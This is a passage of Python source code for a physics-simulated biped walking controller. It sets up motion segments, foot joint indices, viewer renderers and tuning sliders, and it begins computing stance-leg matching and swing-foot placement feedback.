skeleton = motion_ori[0].skeleton\n\n segname = os.path.splitext(filename)[0]+'.seg'\n segfile = open(motionDir+segname, 'r')\n seginfo = load(segfile)\n segfile.close()\n\n if not isCma:\n for seg in seginfo:\n print(seg)\n\n intervals = [info['interval'] for info in seginfo]\n states = [info['state'] for info in seginfo]\n temp_motion = copy.deepcopy(motion_ori)\n segments = yma.splitMotionIntoSegments(temp_motion, intervals)\n if not isCma:\n print(len(intervals), 'segments')\n for i in range(len(intervals)):\n print('%dth'%i, yba.GaitState.text[states[i]], intervals[i], ',',)\n print(\"\")\n\n motion_seg_orig = ym.JointMotion()\n motion_seg_orig += segments[0]\n motion_seg = ym.JointMotion()\n motion_seg += segments[0]\n motion_stitch = ym.JointMotion()\n motion_stitch += segments[0]\n\n motion_stf_stabilize = ym.JointMotion()\n motion_match_stl = ym.JointMotion()\n motion_swf_placement = ym.JointMotion()\n motion_swf_height = ym.JointMotion()\n motion_swf_orientation = ym.JointMotion()\n motion_stf_balancing = ym.JointMotion()\n motion_stf_push = ym.JointMotion()\n motion_control = ym.JointMotion()\n\n motion_debug1 = ym.JointMotion()\n motion_debug2 = ym.JointMotion()\n motion_debug3 = ym.JointMotion()\n\n P = ym.JointMotion()\n P_hat = ym.JointMotion()\n M_tc = 
ym.JointMotion()\n M_hat_tc_1 = ym.JointMotion()\n\n #===============================================================================\n # loop variable\n #===============================================================================\n seg_index = [0]\n acc_offset = [0]\n extended = [False]\n prev_R_swp = [None]\n stl_y_limit_num = [0]\n stl_xz_limit_num = [0]\n avg_dCM = [mm.O_Vec3()]\n # avg_stf_v = [mm.O_Vec3()]\n # avg_stf_av = [mm.O_Vec3()]\n\n # stf_push_func = [yfg.zero]\n step_length_cur = [0.]\n\n step_length_tar = [0.]\n step_axis = [mm.O_Vec3()]\n #===============================================================================\n # information\n #===============================================================================\n bodyIDsToCheck = range(dartModel.getBodyNum())\n # bodyIDsToCheck = [dartModel.getBody(\"LeftFoot\").index_in_skeleton(), dartModel.getBody(\"RightFoot\").index_in_skeleton()]\n mus = [mu]*len(bodyIDsToCheck)\n\n totalMass = dartModel.getTotalMass()\n # bodyMasses = controlModel.getBodyMasses()\n # totalMass = controlModel.getTotalMass()\n\n # hwangpil\n # extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_1_0',\n # 'Foot_foot_1_1', 'Foot_foot_2_0', 'Foot_foot_2_1']\n\n extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0',\n 'Foot_foot_1_1', 'Foot_foot_1_2']\n\n # extendedFootName = ['Foot_foot_0_1', 'Foot_foot_1_1', 'Foot_foot_2_1']\n\n\n ToeName = ['Foot_foot_0_0_0', 'Foot_foot_0_1_0']\n HeelName = ['Foot_foot_1_0', 'Foot_foot_1_1', 'Foot_foot_1_2']\n\n lIDs = [skeleton.getJointIndex('Left'+name) for name in extendedFootName]\n rIDs = [skeleton.getJointIndex('Right'+name) for name in extendedFootName]\n\n lIDdic = {'Left'+name:skeleton.getJointIndex('Left'+name) for name in extendedFootName}\n rIDdic = {'Right'+name:skeleton.getJointIndex('Right'+name) for name in extendedFootName}\n footIdDic = lIDdic.copy()\n footIdDic.update(rIDdic)\n\n lToes = [skeleton.getJointIndex('Left'+name) for name in ToeName]\n rToes = [skeleton.getJointIndex('Right'+name) for name in ToeName]\n\n lHeels = [skeleton.getJointIndex('Left'+name) for name in HeelName]\n rHeels = [skeleton.getJointIndex('Right'+name) for name in HeelName]\n\n footDofNames = [] # type: list[str]\n footDofNames += sum(list(['j_Left'+name+'_x', 'j_Left'+name+'_y', 'j_Left'+name+'_z'] for name in extendedFootName), [])\n footDofNames += sum(list(['j_Right'+name+'_x', 'j_Right'+name+'_y', 'j_Right'+name+'_z'] for name in extendedFootName), [])\n\n footDofs = None\n if SEGMENT_FOOT:\n footDofs = dartModel.skeleton.dof_indices(footDofNames)\n LeftFootDofs = dartModel.skeleton.dof_indices(['j_LeftFoot_x','j_LeftFoot_y','j_LeftFoot_z'])\n RightFootDofs = dartModel.skeleton.dof_indices(['j_RightFoot_x','j_RightFoot_y','j_RightFoot_z'])\n\n # controlled foot joint dofs\n if SEGMENT_FOOT:\n variableDofIdx = dartModel.skeleton.dof_indices(footDofNames)\n # joint dofs except foot joint\n specifiedDofIdx = list(range(dartModel.getTotalDOF()))\n for dofidx in variableDofIdx:\n specifiedDofIdx.remove(dofidx)\n\n # for i in lIDs+rIDs:\n # controlModel.setHybridDynamics(i, \"DYNAMIC\")\n\n # each dof is whether KINEMATIC or not\n hdAccMask = [True]*dartModel.getTotalDOF()\n hdAccMask[:6] = [False]*6\n # for i in lIDs+rIDs:\n # hdAccMask[3+3*i : 6+3*i] = [False]*3\n\n # for i in range(1, len(dartModel.skeleton.joints)):\n # dartModel.skeleton.joints[i].set_actuator_type(pydart.Joint.ACCELERATION)\n\n\n lID = 
dartModel.skeleton.bodynode_index('LeftFoot')\n rID = dartModel.skeleton.bodynode_index('RightFoot')\n\n lUpLeg = skeleton.getJointIndex('LeftUpLeg');rUpLeg = skeleton.getJointIndex('RightUpLeg')\n lKnee = skeleton.getJointIndex('LeftLeg'); rKnee = skeleton.getJointIndex('RightLeg')\n lFoot = skeleton.getJointIndex('LeftFoot'); rFoot = skeleton.getJointIndex('RightFoot')\n spine = skeleton.getJointIndex('Spine')\n\n uppers = [skeleton.getJointIndex(name) for name in ['Hips', 'Spine', 'Spine1', 'LeftArm', 'LeftForeArm', 'RightArm', 'RightForeArm']]\n # upperMass = sum([bodyMasses[i] for i in uppers])\n lLegs = [skeleton.getJointIndex(name) for name in ['LeftUpLeg', 'LeftLeg', 'LeftFoot']]\n rLegs = [skeleton.getJointIndex(name) for name in ['RightUpLeg', 'RightLeg', 'RightFoot']]\n allJoints = set(range(skeleton.getJointNum()))\n\n\n '''\n footMass = sum([bodyMasses[i] for i in lIDs]) + bodyMasses[lID]\n HeelMass = sum([bodyMasses[i] for i in lHeels])\n ToeMass = sum([bodyMasses[i] for i in lToes])\n print('totalMass: ', totalMass)\n print('footMass: ', footMass)\n print('heelmass: ', HeelMass)\n print('ToeMass: ', ToeMass)\n #'''\n\n halfFootHeight = SEGMENT_FOOT_RAD\n if not SEGMENT_FOOT:\n halfFootHeight = dartModel.getBody(lFoot).shapenodes[0].shape.size()[1]/2.\n\n for fi in forceInfos:\n fi.targetBody = spine\n\n #hwangpil\n prev_contact_count = [0]\n\n #===========================================================================\n # data collection\n #===========================================================================\n rhip_torques = []\n rknee_torques = []\n rankle_torques = []\n rankle_torques = []\n\n #===============================================================================\n # rendering\n #===============================================================================\n rd_CM = [None]; rd_CP = [None]; rd_CMP = [None]\n rd_forces = [None]; rd_force_points = [None]\n rd_torques = []; rd_joint_positions = []\n\n rd_point1 = [None]\n rd_point2 = [None]\n rd_vec1 = [None]; rd_vecori1 = [None]\n rd_vec2 = [None]; rd_vecori2 = [None]\n rd_frame1 = [None]\n rd_frame2 = [None]\n\n rd_cForces = [None]\n rd_cPositions = [None]\n rd_cForcesControl = [None]\n rd_cPositionsControl = [None]\n\n viewer = None\n plot = None\n # plot = ymp.InteractivePlot()\n\n def getParamVal(paramname):\n return viewer.objectInfoWnd.getVal(paramname)\n\n # renderer settings\n if not isCma:\n if MULTI_VIEWER:\n viewer = ymv.MultiViewer(800, 655)\n # viewer = ymv.MultiViewer(800, 655, True)\n viewer.setRenderers1([yr.DartModelRenderer(dartMotionModel, MOTION_COLOR)])\n viewer.setRenderers2([yr.DartModelRenderer(dartModel, (200, 200, 0))])\n else:\n # viewer = ysv.SimpleViewer()\n # viewer = hsv.hpSimpleViewer(viewForceWnd=True)\n viewer = hsv.hpSimpleViewer(viewForceWnd=False)\n # viewer.record(False)\n if not isCma:\n viewer.doc.addRenderer('motionModel', yr.DartModelRenderer(dartMotionModel, (0,150,255), yr.POLYGON_LINE))\n viewer.doc.addRenderer('controlModel', yr.DartModelRenderer(dartModel, (50, 200, 200)))\n\n viewer.doc.addObject('motion_ori', motion_ori)\n viewer.doc.addObject('motion_stf_stabilize', motion_stf_stabilize)\n viewer.doc.addObject('motion_match_stl', motion_match_stl)\n viewer.doc.addObject('motion_swf_placement', motion_swf_placement)\n viewer.doc.addObject('motion_swf_height', motion_swf_height)\n viewer.doc.addObject('motion_swf_orientation', motion_swf_orientation)\n viewer.doc.addObject('motion_stf_push', motion_stf_push)\n viewer.doc.addObject('motion_stf_balancing', 
motion_stf_balancing)\n viewer.doc.addObject('motion_control', motion_control)\n\n viewer.doc.addRenderer('motion_ori', yr.JointMotionRenderer(motion_ori, (0,100,255), yr.LINK_BONE))\n motion_ori.resourceName = 'motion_ori'\n # viewer.doc.addRenderer('motion_seg_orig', yr.JointMotionRenderer(motion_seg_orig, (0,100,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_seg', yr.JointMotionRenderer(motion_seg, (0,150,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_stitch', yr.JointMotionRenderer(motion_stitch, (0,255,200), yr.LINK_BONE))\n\n viewer.doc.addRenderer('motion_match_stl', yr.JointMotionRenderer(motion_match_stl, (255,200,0), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_swf_placement', yr.JointMotionRenderer(motion_swf_placement, (255,100,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_swf_height', yr.JointMotionRenderer(motion_swf_height, (50,255,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_push', yr.JointMotionRenderer(motion_stf_push, (50,255,200), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_stabilize', yr.JointMotionRenderer(motion_stf_stabilize, (255,0,0), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_balancing', yr.JointMotionRenderer(motion_stf_balancing, (255,100,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_control', yr.JointMotionRenderer(motion_control, (255,0,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_swf_orientation', yr.JointMotionRenderer(motion_swf_orientation, (255,100,0), yr.LINK_BONE))\n motion_stf_stabilize.resourceName = 'motion_stf_stabilize'\n motion_match_stl.resourceName = 'motion_match_stl'\n motion_swf_placement.resourceName = 'motion_swf_placement'\n motion_swf_height.resourceName = 'motion_swf_height'\n motion_swf_orientation.resourceName = 'motion_swf_orientation'\n motion_stf_push.resourceName = 'motion_stf_push'\n motion_stf_balancing.resourceName = 'motion_stf_balancing'\n motion_control.resourceName = 'motion_control'\n\n # viewer.doc.addRenderer('motion_debug1', yr.JointMotionRenderer(motion_debug1, (0,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_debug2', yr.JointMotionRenderer(motion_debug2, (255,0,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_debug3', yr.JointMotionRenderer(motion_debug3, (255,255,0), yr.LINK_BONE))\n\n # viewer.doc.addRenderer('M_tc', yr.JointMotionRenderer(M_tc, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('P_hat', yr.JointMotionRenderer(P_hat, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('P', yr.JointMotionRenderer(P, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('M_hat_tc_1', yr.JointMotionRenderer(M_hat_tc_1, (255,255,0), yr.LINK_BONE))\n\n # viewer.doc.addRenderer('rd_CM', yr.PointsRenderer(rd_CM, (255,255,0)))\n # viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (255,0,0)))\n # viewer.doc.addRenderer('rd_CMP', yr.PointsRenderer(rd_CMP, (0,255,0)))\n # viewer.doc.addRenderer('forces', yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, fromPoint=False))\n # viewer.doc.addRenderer('torques', yr.VectorsRenderer(rd_torques, rd_joint_positions, (255,0,0)))\n\n viewer.doc.addRenderer('rd_contactForcesControl', yr.VectorsRenderer(rd_cForcesControl, rd_cPositionsControl, (255, 0, 0), .1, 'rd_c1'))\n viewer.doc.addRenderer('rd_contactForces', yr.VectorsRenderer(rd_cForces, rd_cPositions, (0, 255, 0), .1, 'rd_c2'))\n\n viewer.doc.addRenderer('rd_point1', yr.PointsRenderer(rd_point1, (0,255,0)))\n viewer.doc.addRenderer('rd_point2', yr.PointsRenderer(rd_point2, (255,0,0)))\n # 
viewer.doc.addRenderer('rd_vec1', yr.VectorsRenderer(rd_vec1, rd_vecori1, (255,0,0)))\n viewer.doc.addRenderer('rd_vec2', yr.VectorsRenderer(rd_vec2, rd_vecori2, (0,255,0)))\n # viewer.doc.addRenderer('rd_frame1', yr.FramesRenderer(rd_frame1, (0,200,200)))\n viewer.doc.addRenderer('rd_frame2', yr.FramesRenderer(rd_frame2, (200,200,0)))\n # viewer.setMaxFrame(len(motion_ori)-1)\n\n viewer.objectInfoWnd.add1DSlider(\"penalty_grf_gain\", 0., 5000., 10., Ks)\n viewer.objectInfoWnd.add1DSlider(\"c_min_contact_vel\", 0., 200., .2, 100.)\n viewer.objectInfoWnd.add1DSlider(\"c_min_contact_time\", 0., 5., .01, .7)\n viewer.objectInfoWnd.add1DSlider(\"c_landing_duration\", 0., 5., .01, .2)\n viewer.objectInfoWnd.add1DSlider(\"c_taking_duration\", 0., 5., .01, .3)\n viewer.objectInfoWnd.add1DSlider(\"c_swf_mid_offset\", -1., 1., .001, c_swf_mid_offset)\n viewer.objectInfoWnd.add1DSlider(\"c_locking_vel\", 0., 1., .001, .05)\n\n viewer.objectInfoWnd.add1DSlider(\"c_swf_offset\", -1., 1., .001, .01)\n viewer.objectInfoWnd.add1DSlider(\"K_stp_pos\", 0., 1., .01, 0.)\n\n viewer.objectInfoWnd.add1DSlider(\"c5\", 0., 5., .01, c5)\n viewer.objectInfoWnd.add1DSlider(\"c6\", 0., 1., .01, c6)\n viewer.objectInfoWnd.add1DSlider(\"K_stb_vel\", 0., 1., .01, K_stb_vel)\n viewer.objectInfoWnd.add1DSlider(\"K_stb_pos\", 0., 1., .01, K_stb_pos)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_sag\", 0., 5., .01, K_swp_vel_sag)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_cor\", 0., 5., .01, K_swp_vel_cor)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag\", 0., 5., .01, K_swp_pos_sag)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_cor\", 0., 5., .01, K_swp_pos_cor)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag_faster\",0., 1., .01, K_swp_pos_sag_faster)\n\n viewer.objectInfoWnd.add1DSlider(\"LeftFootKp\", 0., 500., 10., 300.)\n viewer.objectInfoWnd.add1DSlider(\"LeftFootKd\", 0., 100., 1., 30.)\n viewer.objectInfoWnd.add1DSlider(\"RightFootKp\", 0., 500., 10., 300.)\n viewer.objectInfoWnd.add1DSlider(\"RightFootKd\", 0., 100., 1., 30.)\n\n if viewer.cForceWnd is not None:\n viewer.cForceWnd.addDataSet('expForce', FL_BLACK)\n viewer.cForceWnd.addDataSet('desForceMin', FL_RED)\n viewer.cForceWnd.addDataSet('desForceMax', FL_RED)\n viewer.cForceWnd.addDataSet('realForce', FL_GREEN)\n\n if not REPEATED:\n viewer.setMaxFrame(len(motion_ori)-1)\n else:\n viewer.setMaxFrame(MAX_FRAME)\n\n if CAMERA_TRACKING:\n if MULTI_VIEWER:\n cameraTargets1 = [None] * (viewer.getMaxFrame()+1)\n cameraTargets2 = [None] * (viewer.getMaxFrame()+1)\n else:\n cameraTargets = [None] * (viewer.getMaxFrame()+1)\n\n if TORQUE_PLOT:\n rhip_torques = [0.]*viewer.getMaxFrame()\n rknee_torques = [0.]*viewer.getMaxFrame()\n rankle_torques = [0.]*viewer.getMaxFrame()\n\n\n # ===============================================================================\n # viewer setting for parameter setting\n # ===============================================================================\n\n # pt = [0.]\n def postFrameCallback_Always(frame):\n # if frame==1: pt[0] = time.time()\n # if frame==31: print 'elapsed time for 30 frames:', time.time()-pt[0]\n if CAMERA_TRACKING:\n if MULTI_VIEWER:\n if cameraTargets1[frame] is None:\n # cameraTargets1[frame] = motionModel.getBodyPositionGlobal(0)\n cameraTargets1[frame] = dartMotionModel.getBodyPositionGlobal(0)\n # cameraTargets1[frame] = motion_ori[frame].getJointPositionGlobal(0)\n viewer.setCameraTarget1(cameraTargets1[frame])\n\n if cameraTargets2[frame] is None:\n # cameraTargets2[frame] = 
controlModel.getJointPositionGlobal(0)\n cameraTargets2[frame] = dartModel.getJointPositionGlobal(0)\n viewer.setCameraTarget2(cameraTargets2[frame])\n\n else:\n if cameraTargets[frame] is None:\n cameraTargets[frame] = dartModel.getJointPositionGlobal(0)\n # cameraTargets[frame] = controlModel.getJointPositionGlobal(0)\n viewer.setCameraTarget(cameraTargets[frame])\n if plot is not None:\n plot.updateVline(frame)\n\n\n if not isCma:\n viewer.setPostFrameCallback_Always(postFrameCallback_Always)\n\n if plot is not None:\n plot.setXlimit(0, len(motion_ori))\n plot.setYlimit(-0.05, .05)\n plot.addDataSet('zero')\n plot.addDataSet('diff')\n plot.addDataSet('debug1')\n plot.addDataSet('debug2')\n\n\n def viewer_onClose(data):\n if plot is not None:\n plot.close()\n viewer.onClose(data)\n viewer.callback(viewer_onClose)\n\n if not isCma:\n for bodynode in dartModel.skeleton.bodynodes:\n print(bodynode.name, bodynode.mass())\n\n feedback = hbf.HpBipedFeedback(dartModel, motion_ori, seginfo)\n\n def simulateCallback(frame):\n if not isCma:\n print('frame: ', frame)\n # c_min_contact_vel, c_min_contact_time, c_landing_duration, \\\n # c_taking_duration, c_swf_mid_offset, c_locking_vel, c_swf_offset, \\\n # K_stp_pos, c5, c6, K_stb_vel, K_stb_pos, K_swp_vel_sag, K_swp_vel_cor, \\\n # K_swp_pos_sag, K_swp_pos_cor, K_swp_pos_sag_faster = viewer.objectInfoWnd.getVals()\n if not isCma:\n # if not isCma and params is None:\n Ks = getParamVal(\"penalty_grf_gain\")\n Ds = 2.*(Ks**.5)\n c_min_contact_vel = getParamVal(\"c_min_contact_vel\")\n c_min_contact_time = getParamVal(\"c_min_contact_time\")\n c_landing_duration = getParamVal(\"c_landing_duration\")\n c_taking_duration = getParamVal(\"c_taking_duration\")\n c_swf_mid_offset = getParamVal(\"c_swf_mid_offset\")\n c_locking_vel = getParamVal(\"c_locking_vel\")\n c_swf_offset = getParamVal(\"c_swf_offset\")\n K_stp_pos = getParamVal(\"K_stp_pos\")\n c5 = getParamVal(\"c5\")\n c6 = getParamVal(\"c6\")\n K_stb_vel = getParamVal(\"K_stb_vel\")\n K_stb_pos = getParamVal(\"K_stb_pos\")\n K_swp_vel_sag = getParamVal(\"K_swp_vel_sag\")\n K_swp_vel_cor = getParamVal(\"K_swp_vel_cor\")\n K_swp_pos_sag = getParamVal(\"K_swp_pos_sag\")\n K_swp_pos_cor = getParamVal(\"K_swp_pos_cor\")\n K_swp_pos_sag_faster = getParamVal(\"K_swp_pos_sag_faster\")\n elif params is not None:\n _params = np.around(params, decimals=3)\n Ks = 1000.\n Ds = 2. 
* (Ks ** .5)\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n c_swf_mid_offset = .02\n c_locking_vel = .05\n\n # c_swf_offset = .0\n c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = _params[0] * _params[0]\n c5 = _params[1] * _params[1]\n c6 = _params[2] * _params[2]\n K_stb_vel = _params[3] * _params[3]\n K_stb_pos = _params[4] * _params[4]\n K_swp_vel_sag = _params[5] * _params[5]\n K_swp_vel_cor = _params[6] * _params[6]\n K_swp_pos_sag = _params[7] * _params[7]\n K_swp_pos_cor = _params[8] * _params[8]\n K_swp_pos_sag_faster = _params[9] * _params[9]\n\n # feedback.refresh_frame_dyn_information(motion_seg, frame, avg_dCM)\n\n # seginfo\n segIndex = seg_index[0]\n curState = seginfo[segIndex]['state']\n cur_interval = yma.offsetInterval(acc_offset[0], seginfo[segIndex]['interval'])\n stanceLegs = seginfo[segIndex]['stanceHips']\n swingLegs = seginfo[segIndex]['swingHips']\n stanceFoots = seginfo[segIndex]['stanceFoots']\n swingFoots = seginfo[segIndex]['swingFoots']\n swingKnees = seginfo[segIndex]['swingKnees']\n groundHeight = seginfo[segIndex]['ground_height']\n maxStfPushFrame = seginfo[segIndex]['max_stf_push_frame']\n\n # hwangpil\n # temporary change\n for legList in (stanceLegs, swingLegs):\n for legIdx in range(len(legList)):\n if legList[legIdx] == 10:\n legList[legIdx] = skeleton.getJointIndex('RightUpLeg')\n\n for footList in (stanceFoots, swingFoots):\n for footIdx in range(len(footList)):\n if footList[footIdx] == 12:\n footList[footIdx] = skeleton.getJointIndex('RightFoot')\n\n stanceToes = []\n if skeleton.getJointIndex('LeftFoot') in stanceFoots:\n stanceToes.extend(lToes)\n if skeleton.getJointIndex('RightFoot') in stanceFoots:\n stanceToes.extend(rToes)\n\n stanceHeels = []\n if skeleton.getJointIndex('LeftFoot') in stanceFoots:\n stanceHeels.extend(lHeels)\n if skeleton.getJointIndex('RightFoot') in stanceFoots:\n stanceHeels.extend(rHeels)\n\n swingToes = []\n if skeleton.getJointIndex('LeftFoot') in swingFoots:\n swingToes.extend(lToes)\n if skeleton.getJointIndex('RightFoot') in swingFoots:\n swingToes.extend(rToes)\n\n swingHeels = []\n if skeleton.getJointIndex('LeftFoot') in swingFoots:\n swingHeels.extend(lHeels)\n if skeleton.getJointIndex('RightFoot') in swingFoots:\n swingHeels.extend(rHeels)\n\n prev_frame = frame-1 if frame>0 else 0\n\n # information\n dCM_tar = motion_seg.getJointVelocityGlobal(0, prev_frame)\n CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)\n stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], prev_frame)\n CMr_tar = CM_tar - stf_tar\n\n # dCM : average velocity of root of controlModel over 1 frame\n dCM = avg_dCM[0]\n CM = dartModel.getBody(\"Hips\").com()\n CMreal = dartModel.getCOM()\n stf = dartModel.getJointPositionGlobal(stanceFoots[0])\n CMr = CM - stf\n\n # diff_dCM : diff of velocity of COM between current and desired\n diff_dCM = mm.projectionOnPlane(dCM-dCM_tar, (1,0,0), (0,0,1))\n # diff_dCM_axis : perpendicular of diff_dCM\n diff_dCM_axis = np.cross((0,1,0), diff_dCM)\n rd_vec1[0] = diff_dCM\n rd_vecori1[0] = CM_tar\n\n diff_CMr = mm.projectionOnPlane(CMr-CMr_tar, (1,0,0), (0,0,1))\n diff_CMr_axis = np.cross((0,1,0), diff_CMr)\n\n direction = mm.normalize2(mm.projectionOnPlane(dCM_tar, (1,0,0), (0,0,1)))\n directionAxis = np.cross((0,1,0), direction)\n\n diff_dCM_sag, diff_dCM_cor = mm.projectionOnVector2(diff_dCM, direction)\n diff_dCM_sag_axis = np.cross((0,1,0), diff_dCM_sag)\n diff_dCM_cor_axis = 
np.cross((0,1,0), diff_dCM_cor)\n\n        diff_CMr_sag, diff_CMr_cor = mm.projectionOnVector2(diff_CMr, direction)\n        diff_CMr_sag_axis = np.cross((0,1,0), diff_CMr_sag)\n        diff_CMr_cor_axis = np.cross((0,1,0), diff_CMr_cor)\n\n        t = (frame-cur_interval[0])/float(cur_interval[1]-cur_interval[0])\n        t_raw = t\n        if t>1.: t=1.\n\n        p_root = motion_stitch[frame].getJointPositionGlobal(0)\n        R_root = motion_stitch[frame].getJointOrientationGlobal(0)\n\n        motion_seg_orig.goToFrame(frame)\n        motion_seg.goToFrame(frame)\n        motion_stitch.goToFrame(frame)\n\n        motion_debug1.append(motion_stitch[frame].copy())\n        motion_debug1.goToFrame(frame)\n        motion_debug2.append(motion_stitch[frame].copy())\n        motion_debug2.goToFrame(frame)\n        motion_debug3.append(motion_stitch[frame].copy())\n        motion_debug3.goToFrame(frame)\n\n        # paper implementation\n        M_tc.append(motion_stitch[prev_frame])\n        M_tc.goToFrame(frame)\n        P_hat.append(M_tc[frame].copy())\n        P_hat.goToFrame(frame)\n\n        # p_temp = ym.JointPosture(skeleton)\n        # p_temp.rootPos = controlModel.getJointPositionGlobal(0)\n        # p_temp.setJointOrientationsLocal(controlModel.getJointOrientationsLocal())\n        # P.append(p_temp)\n        # P.goToFrame(frame)\n\n        '''\n        # Jacobian Transpose Balance Control\n        balanceKp = 100.\n        balanceKd = 100.\n        balanceDiff = dartMotionModel.getCOM() - dartModel.getCOM()\n        balanceDiff[1] = 0.\n        balanceVelDiff = -dartModel.skeleton.com_velocity()\n        balanceVelDiff[1] = 0.\n        balanceTorque = np.dot(dartModel.getBody('RightFoot').world_jacobian()[3:6].T,\n                               balanceKp*balanceDiff + balanceKd*balanceVelDiff)\n        balanceTorque[:6] = np.array([0.]*6)\n        '''\n\n        '''\n        # stance foot stabilize\n        motion_stf_stabilize.append(motion_stitch[frame].copy())\n        motion_stf_stabilize.goToFrame(frame)\n        if STANCE_FOOT_STABILIZE:\n            for stanceFoot in stanceFoots:\n                R_target_foot = motion_seg[frame].getJointOrientationGlobal(stanceFoot)\n                R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)\n                motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, mm.slerp(R_current_foot, R_target_foot, stf_stabilize_func(t)))\n                # motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, cm.slerp(R_current_foot, R_target_foot, stf_stabilize_func(t)))\n                # R_target_foot = motion_seg[frame].getJointOrientationLocal(stanceFoot)\n                # R_current_foot = motion_stf_stabilize[frame].getJointOrientationLocal(stanceFoot)\n                # motion_stf_stabilize[frame].setJointOrientationLocal(stanceFoot, cm.slerp(R_current_foot, R_target_foot, stf_stabilize_func(t)))\n        #'''\n\n        # match stance leg\n        # motion_match_stl.append(motion_stf_stabilize[frame].copy())\n        motion_match_stl.append(motion_stitch[frame].copy())\n        motion_match_stl.goToFrame(frame)\n        if MATCH_STANCE_LEG:\n            # hbf.match_stance_leg(t, dartModel, motion_match_stl, frame, curState, stanceLegs)\n            if curState != yba.GaitState.STOP:\n                for stanceLegIdx in range(len(stanceLegs)):\n                    stanceLeg = stanceLegs[stanceLegIdx]\n                    # stanceFoot = stanceFoots[stanceLegIdx]\n\n                    # blend the motion's stance leg toward the character's stance leg as time goes by\n                    R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)\n                    R_character = dartModel.getJointOrientationGlobal(stanceLeg)\n                    motion_match_stl[frame].setJointOrientationGlobal(stanceLeg, mm.slerp(R_motion, R_character, match_stl_func(t)))\n\n        # swing foot placement\n        # TODO:\n        # in the segment-foot case, the hip gets slightly noisy\n        motion_swf_placement.append(motion_match_stl[frame].copy())\n        motion_swf_placement.goToFrame(frame)\n        if SWING_FOOT_PLACEMENT:\n            t_swing_foot_placement = swf_placement_func(t)\n\n            if 
extended[0]:\n R_swp_sag = prev_R_swp[0][0]\n R_swp_cor = prev_R_swp[0][1]\n else:\n clampAngle = math.pi/6.\n R_swp_sag = mm.I_SO3(); R_swp_cor = mm.I_SO3()\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_swp_vel_sag * -t_swing_foot_placement))\n # R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement))\n # if np.dot(direction, diff_CMr_sag) < 0:\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement))\n # else:\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement))\n # R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement))\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_dCM_sag_axis * K_swp_vel_sag * -t_swing_foot_placement, clampAngle))\n R_swp_cor = np.dot(R_swp_cor, mm.clampExp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement, clampAngle))\n if np.dot(direction, diff_CMr_sag) < 0:\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement, clampAngle))\n else:\n R_swp_sag = np.dot(R_swp_sag, mm.clampExp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement, clampAngle))\n R_swp_cor = np.dot(R_swp_cor, mm.clampExp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement, clampAngle))\n\n for i in range(len(swingLegs)):\n swingLeg = swingLegs[i]\n swingFoot = swingFoots[i]\n\n # save swing foot global orientation\n R_swf = motion_swf_placement[frame].getJointOrientationGlobal(swingFoot)\n\n # rotate swing leg\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_sag)\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_cor)\n\n # hwangpil\n # temporal code.... 
